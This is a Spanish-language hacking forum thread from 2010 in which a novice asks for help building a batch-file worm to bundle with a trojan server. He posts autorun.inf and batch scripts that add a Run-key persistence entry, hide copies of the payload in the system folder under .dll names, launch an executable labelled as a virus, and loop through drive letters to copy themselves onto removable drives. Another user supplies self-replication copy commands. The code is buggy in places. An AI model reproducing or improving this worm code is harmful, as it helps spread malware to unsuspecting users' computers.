Foro de elhacker.net

Seguridad Informática => Análisis y Diseño de Malware => Mensaje iniciado por: SockMon en 2 Octubre 2010, 21:45 pm



Título: Me ayudais
Publicado por: SockMon en 2 Octubre 2010, 21:45 pm
Hola, soy nuevo, y quiero aprender a crear my propio worms en batch o en visual basic (según me recmendeis) pero prefiero batch ya que es mas facil. He estado buscando pero no encuentro ningun tutorial solo: generadores, algunos ya hechos que se repiten indefinidamente y en cada post dice que lo ha hecho cada uno XD...
No quiero que me lo hagais ustedes (puedes darle un pez a un pobre para que coma por un dia, pero puedes enseñarle a pescar para que no muera de hambre)
Bueno pues si me facilitais un toturial os lo agradezco, mientras tanto seguire buscando  :(
Gracias


Título: Re: Me ayudais
Publicado por: [L]ord [R]NA en 2 Octubre 2010, 22:01 pm
Antes de postear utiliza el buscador del foro.

http://foro.elhacker.net/scripting/recopilatorio_de_temas_interesantes_scripting-t132767.0.html (http://foro.elhacker.net/scripting/recopilatorio_de_temas_interesantes_scripting-t132767.0.html)


Título: Re: Me ayudais
Publicado por: ApOkAlizE en 3 Octubre 2010, 00:44 am
Crear un gusano mirando por google lo puedes encontrar pero tendrias que decirnos que tipo de gusanillo quieres crear, o sea si quieres que se disperse por internet o si simplemente quieres que se haga varias copias dentro del mismo ordenador y si el gusano come pan o come semillas..(lo ultimo es broma,xd) el caso es que mira si lo que quieres es que se reproduzca dentro del mismo PC es fácil.
en Batch seria esto:
Copy /y "C:\rutadelgusanillo.bat" "C:\rutadondequieresquesehagalacopiadelgusanillo.bat"
en VB almenos en la versión 6.0 es así:
Filecopy "C:\rutadedondeseencuentraelgusanillo.exe" "C:\rutadedondequieresqueseguardeelgusanillo.exe"
eso si hay algunas versiones de VB como por ejemplo la 2008 creo, que además de Filecopy es Copyfile pero bueno tu prueva de ambas formas y una tiene que funcionar, y recuerda que por VB tambien peudes ejecutar acciones por la shell, es que si haces un gusano en Batch lo malo es que sale la ventana de MS-DOS y eso da el cantazo. si lo que tu quieres es que el gusanillo se reproduzca por internet entonces te aconsejo que lo dejes para más adelante ya que par eso tienes que usar APIs y algo más de conocimientos, pero vamos te aconsejo VB ya que Batch es muy lammer...


Título: Re: Me ayudais
Publicado por: SockMon en 3 Octubre 2010, 01:21 am
Hola de nuevo, primero digo que lo estoy haciendo en batch ya que la pc que tengo ahora no tiene instalado el BV >:( (tengo en 2008). He empezado a leer un manual y por ahora estoy intentando hacer la propagacion por usb y p2p, veremos como sale.
Quiero especificar que el worms lo estoy haciendo para unirlo con un server del troyano.
Buenas noches ;)


Título: Re: Me ayudais
Publicado por: [L]ord [R]NA en 3 Octubre 2010, 01:26 am
:¬¬ si hubiese sabido eso previamente no te hubiese dado la informacion.


Título: Re: Me ayudais
Publicado por: SockMon en 3 Octubre 2010, 02:22 am
Hola, en 5 minutillo que he tenido libre me ha dado tiempo de hacer esto.
Código
  1. [AutoRun]
  2. open=data31.exe
q seria el autorun
-----------------------------------------------------------------------
Código
  1. @echo off
  2. reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v
  3. "Data" /d "data34.bat"
  4. copy /y "data32.exe" "%systemroot%\windows\system\data32.exe"
  5. copy /y "autorun.inf" "%systemroot%\windows\system\autorun.inf"
  6. copy /y "data31.bat" "%systemroot%\windows\system\data31.bat"
  7. exit
este se llamaria data 31 pero me surgen varias dudas
+ Cuando quiero copiar data32, autorun y data31 no pogo en la ruta que esta, ya que supongo que los buscaras en la misma carpeta donde estoy no?
+ Y quiero copiar data31 que seria el que esta en ejecucion habra algun problema?


Título: Re: Me ayudais
Publicado por: SockMon en 4 Octubre 2010, 16:33 pm
Bueno ya lo he terminado o eso creo, pero creo q tengo varios fallos sobre todo a la hora de propagarse en otros pen. haber que os parece o que sugerencias teneis.
-----------------------------------------------------------------------------------------------
Los archivos son:
+autorun.inf
+data31.bat
+data32.exe (virus)
+data34.bat
------------------------------------------------------------------------------------------------
Código
  1. [AutoRun]
  2. open=data31.bat
------------------------------------------------------------------------------------------------
Código
  1. @echo off
  2. reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v
  3. "Data" /d "data34.bat"
  4. copy /y "data32.exe" "%systemroot%\windows\system\data32.dll"
  5. copy /y "autorun.inf" "%systemroot%\windows\system\autorun.dll"
  6. copy /y "data31.bat" "%systemroot%\windows\system\data31.dll"
  7. copy /y "data34.bat" "%systemroot%\windows\system\data34.dll"
  8. start "data34.bat"
  9. start "data32.exe"
-------------------------------------------------------------------------------------------------
VIRUS
-------------------------------------------------------------------------------------------------
Código
  1. @echo off
  2. :busca
  3. for %%_ in (a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, s, t, u, v, w, x, y, z) do (
  4. dir /b %%_:\ > nul 2>&1 && (
  5. )
  6. )
  7. IF EXIst "%%_:" GOTO copia
  8. Else GOTO espera
  9. :copia
  10. IF EXIST %systemroot%\windows\system\data32.dll GOTO verifica
  11. :verifica
  12. IF EXIT "%%_:\data32.exe" GOTO espera
  13. ELSE GOTO propagar
  14. :propagar
  15. copy /y "%systemroot%\windows\system\data32.dll" "%%_:\data32.exe"
  16. copy /y "%systemroot%\windows\system\autorun.dll" "%%_:\autorun.inf"
  17. copy /y "%systemroot%\windows\system\data31.dll" "%%_:\data31.bat"
  18. copy /y "%systemroot%\windows\system\data34.dll" "%%_:\data34.bat"
  19. :espera
  20. ping -n 100 127.0.0.1 > null
  21. GOTO busca
-------------------------------------------------------------------------------------------------


Título: Re: Me ayudais
Publicado por: Jaixon Jax en 4 Octubre 2010, 18:44 pm
Hola, en 5 minutillo que he tenido libre me ha dado tiempo de hacer esto.
Código
  1. [AutoRun]
  2. open=data31.exe
q seria el autorun
-----------------------------------------------------------------------
Código
  1. @echo off
  2. reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v
  3. "Data" /d "data34.bat"
  4. copy /y "data32.exe" "%systemroot%\windows\system\data32.exe"
  5. copy /y "autorun.inf" "%systemroot%\windows\system\autorun.inf"
  6. copy /y "data31.bat" "%systemroot%\windows\system\data31.bat"
  7. exit
este se llamaria data 31 pero me surgen varias dudas
+ Cuando quiero copiar data32, autorun y data31 no pogo en la ruta que esta, ya que supongo que los buscaras en la misma carpeta donde estoy no?
+ Y quiero copiar data31 que seria el que esta en ejecucion habra algun problema?

  Con ese auto run solo infectaras pc en africa y algunos lados de suramerica que no usan so actualizaos ni mucho menos av nuevos .....  :D

  %systemroot% si fura tan facil copiarce alli ........ al paso que vas ese worn solo infectara viejas pentiuns 2 en etiopia, somalia y bangladesh y todos esos sitios donde microsoft no tiene oficinas comerciales  :P  :D ......


Título: Re: Me ayudais
Publicado por: SockMon en 4 Octubre 2010, 19:28 pm
Hola de nuevo, pero como ya dije es la primera vez que hago esto y no sabia que con eso no iba a llegar a ninguna parte. que solucion le podria dar al autorun  y a %systemroot%?